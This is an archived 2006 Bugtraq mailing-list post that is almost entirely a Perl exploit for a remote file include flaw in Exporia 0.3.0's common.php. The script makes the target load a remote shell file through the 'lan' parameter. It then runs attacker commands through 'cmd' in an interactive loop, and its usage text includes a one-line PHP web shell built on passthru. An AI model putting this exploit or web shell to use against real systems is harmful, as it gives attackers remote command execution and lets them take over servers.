lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 28 Oct 2006 07:40:59 -0000 From: h4ck3riran@...oo.com To: bugtraq@...urityfocus.com Subject: Exporia => 0.3.0 Remote File Include Vulnerability Exploit #!/usr/bin/perl # Script.............. :Exporia # Discovered By.... : Root3r_H3ll # Location .......... : Iran # Class.............. : Remote # Original Advisory : http://Www.PersainFox.com & Www.Arashrj.ir # We ArE : Root3r_H3LL & Arash.Rj # <Spical TNX Irania Hackers : # ( Aria-Security , Crouz , DeltaHacking , Iranhackers # Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev , Xmors ) use LWP::Simple; print "...............................................................\n"; print ". .\n"; print ". Exporia => 0.3.0 Remote File Include Vulnerability .\n"; print ". .\n"; print "...............................................................\n"; print ". .\n"; print ". PerSiaNFox NetWork Security TeaM .\n"; print ". Discovered By : Root3r_H3ll .\n"; print ". .\n"; print "...............................................................\n"; print ". .\n"; print ". Www.PerSiaNFox.coM .\n"; print ". .\n"; print "...............................................................\n"; print "\n"; print " I Love HacK & SecUrity \n"; print "\n\n"; my $kw3,$path,$shell,$conexiune,$cmd,$data ; if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} $path = $ARGV[0]; chomp($path); $shell = $ARGV[1]; chomp($shell); $path = $path."/common.php"; sub usage(){ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n"; print 'Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>'; } while () { print "[Root3r_H3LL][Arash.rj]"; chomp($cmd=<STDIN>); if ($cmd eq "exit") { exit(0);} $kw3 = $path."?lan=".$shell."?&cmd=".$cmd; if ($cmd eq "") { print "Enter your command !\n"; } else { $data=get($kw3); print $data ; } }
Powered by blists - more mailing lists